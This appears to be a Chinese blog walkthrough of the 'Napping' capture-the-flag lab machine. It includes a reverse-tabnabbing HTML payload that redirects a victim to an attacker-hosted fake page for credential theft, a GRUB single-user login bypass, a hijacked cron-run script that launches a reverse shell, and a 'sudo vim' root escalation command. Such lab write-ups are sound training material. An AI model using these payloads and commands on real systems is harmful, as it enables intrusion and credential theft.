Napping靶机

一、信息收集

扫描不出ip,改一下网卡配置。

重启一下,在启动时按住shift,出现了下面这个界面后按e,然后找到ro,后面写rw single init=/bin/bash。

修改完后按Ctrl + X ,输入ip a查看网卡ens33,然后cd到etc/netplan,ls发现里面有yaml文件,vim修改(注意:要一级一级去cd)

改成ens33,然后重启一下虚拟机,再去找我们的ip。

开放端口有80,22,我们去访问一下。22端口无法访问,80端口就是主页,他让我们去登录账号,但是我们没有,去注册一个试试。

登录进去之后可以发现一个提交框,我们提交什么网站路径,它就会跳转到这个网站。

二、渗透

我们创建两个页面,一个是正常页面,一个是恶意页面。内容如下:

<html>
        <body>
                <script>
                        if(window.opener) window.opener.parent.location.replace('http://192.168.13.135:8000/1.html');
                        </script>
                        </body>
                        </html>
<html>
        <title>napping</title>
        <body>
                hello
                </body>
                </html>

然后在页面提交http://192.168.13.135/1.html,提交完之后点here,就跳转到我们的1.html页面了。

拿到了账号:daniel,密码:C%40ughtm3napping123,解码:C@ughtm3napping123。使用ssh进行连接。

三、提权

我们首先看看用户属于的组,属于administrators组,使用find命令查找一下这个组可以运行的程序。

 find / -group administrators 2>/dev/null

查看一下这个py文件。

cat /home/adrian/query.py

从文件里我们可以知道,它往site_status.txt文件内写东西,查看一下这个文件。发现貌似两分钟执行一次。

cat /home/adrian/site_status.txt

我们尝试反弹一个shell,我们首先创建一个sh文件。内容是反弹shell。

修改一下python文件,让他自己执行这个文件,从而获取用户权限。

在kali里监听8000端口,等一会就监听到了。然后查看一下权限,可以运行vim,直接使用vim命令提权。

sudo vim -c ':!/bin/bash'

​​​​​​​

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值